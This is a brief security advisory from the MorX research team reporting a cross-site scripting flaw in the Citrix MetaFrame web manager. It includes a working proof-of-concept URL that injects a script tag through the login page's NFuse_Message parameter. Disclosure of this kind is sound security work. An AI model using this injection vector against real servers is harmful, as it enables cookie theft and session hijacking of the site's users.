MetaFrame suffers from a cross site scripting vulnerability.
522a51965498a740a3c54069c1b2e0815d5dfb36304d1c46fc8931da70034d30
Citrix MetaFrame remote xss
Author: handrix
Contact: handrix_at_morx_dot_org
Vulnerability: Cross Site Scripting
Severity: Medium/High
MorX security research team
www.morx.org
The Citrix MetaFrame web manager are vulnerable to XSS attack.
XSS Vector :
http://server/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E